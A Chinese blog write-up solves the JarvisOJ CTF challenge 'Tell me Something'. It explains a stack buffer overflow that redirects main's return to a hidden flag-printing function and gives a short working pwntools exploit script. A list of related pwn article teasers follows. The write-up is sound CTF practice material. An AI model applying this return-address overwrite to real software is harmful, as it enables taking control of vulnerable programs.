JarvisOJ PWN Tell me Something wp

原創 苗_ 2020-06-19 07:28

Tell me Something

先拖進ida裏看一下,發現了"flag.txt"字符串,雙擊發現good_game函數:

查看主函數,發現其中並沒有調用goodgame函數:

所以我們輸入大於buffer長度的數據,溢出的數據將會覆蓋棧上的數據,因此我們將main的返回地址改成goodgame的地址,這樣當main函數執行完之後,將會跳轉到goodgame函數上進行執行,從而拿到flag。

腳本如下:

from pwn import *

p = process("./guestbook")
#p = remote('pwn.jarvisoj.com', 9876)

good_game = 0x0000000000400620
payload = 'a' * 0x88 + p64(good_game)

p.recvline(":")
p.sendline(payload)
p.interactive()

得到flag:

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

已知libc地址爆破TLS、ld.so等地址

已知libc地址爆破TLS、ld.so等地址 在大多數情況下,遠程的ld.so以及TLS等結構的地址與libc地址之間的偏移與本地的會不一樣,但是大致處於一個範圍內,並且,在同一個系統裏,這個差值是固定的,其差值的變化往往在偏移的第1.5

haivk 2020-07-05 02:32:56

ACTF_2019_ACTFNOTE(top chunk上移)

ACTF_2019_ACTFNOTE 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,edit裏存在溢出,可以直接修改top chunk的size 那麼只需要把top chunk的size修改爲-1,然後malloc(負數)

haivk 2020-07-05 02:32:56

iz_heap_lv1

iz_heap_lv1 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,delete功能裏存在數組下標越界,可以free掉第21個堆指針,而第21個位置對應name的空間 因此,我們可以在name裏僞造一個chunk,fr

haivk 2020-07-05 02:32:56

free_spirit(在棧上爆破一個可以被free的fake_chunk)

free_spirit(在棧上爆破一個可以被free的fake_chunk) 首先檢查一下程序的保護機制 然後,我們用IDA分析一下,功能3存在8字節溢出,將會把v7下面的buf指針覆蓋掉,而覆蓋了buf指針,就能實現任意地址寫。  

haivk 2020-07-05 02:32:56

pwn5 - bugku

pwn5 - bugku 前言 2019年12月15日更新 學完ROP之後,重新做一下題目。bugku 5道 pwn 挺適合在學完 ROP 之後用來練習的。 網上對 pwn5 的 wp 視乎好像不是太詳細,就做一篇比較詳細解釋的

SkYe231 2020-07-02 17:10:52

pwn題查找字符串方法記錄

記憶力不太好,簡單記錄一下,用作備忘 更新:2020年4月6日:補充更新一些方法 假設現在有文件如下: 待 Pwn 程序:mypwn libc 文件:libc.so 需要查找的字符串 /bin/sh 在上訴兩個文件中都存在

SkYe231 2020-07-02 17:10:48

PWN練習之環境變量繼承

一、環境變量參數:       在Linux/Windows操作系統中, 每個進程都有其各自的環境變量設置。 缺省情況下, 當一個進程被創建時,除了創建過程中的明確更改外, 它繼承了其父進程的絕大部分環境變量信息。 擴展的C語言main

WateranFire 2020-06-28 22:44:41

CTF-PWN練習之執行Shellcode

Shellcode 的執行可以通過製造溢出修改函數的返回地址,轉爲執行Shellcode 將python文件的輸出導入文件test: python xxx.py > test 在gdb中將test 的內容作爲輸入並運行程序至斷點處: r

WateranFire 2020-06-28 22:44:41

PWN綜合

感覺pwn的知識比較繁雜,列個目錄記錄下 堆 bins介紹 https://www.cnblogs.com/alisecurity/p/5520847.html 繞過 pie繞過 https://blog.csdn.net/Wateran

WateranFire 2020-06-28 22:44:41

pie繞過

遇到use after free之類的漏洞時,利用small bin可以獲取libc的基址,類似這種格式 p1=malloc(200); p2=malloc(200); free(p1); print(*(unsigned long l

WateranFire 2020-06-28 22:44:40

PWN問題記錄

通過系統調用execve("/bin/sh")來拿shell時,注意將rsi,rdx置0,不然可能作爲參數而導致執行出錯。

WateranFire 2020-06-28 22:44:30

pwn之fd

最近小夥伴發現了一個學習pwn的網站:http://www.pwnable.kr/。然後想着一塊進行,把做過的都記 錄下來。那麼開始第一個吧! pwn學習的遊戲網站                 1.點一下fd圖片出現:        

独木_DZ 2020-06-26 20:21:33

pwn之bof

有一兩週沒更新了,堅持...  接着前邊繼續第三篇bof. 這次讓我們直接下載bof.c,以及bof文件.分析代碼和文件,然後在pwnable.kr 9000執行,獲取flag 1.先看下bof.c的代碼: #include <st

独木_DZ 2020-06-26 20:21:23

pwn之flag

接前邊繼續開始第四個小項目flag,點開,要自己下載 Download : http://pwnable.kr/bin/flag      1.用個16進制查看器看一下,是elf文件,並且加了upx殼,要脫下upx殼纔好分析 2.利用

独木_DZ 2020-06-26 20:21:23

pwn之collision

接前篇,記錄下collision的搞法.                     1.點擊collision有如下顯示,還是ssh登錄,今天換一種登陸方式.用windows下的winscp將文件拷貝到本地.需要的在這安裝 https:/

独木_DZ 2020-06-26 20:21:22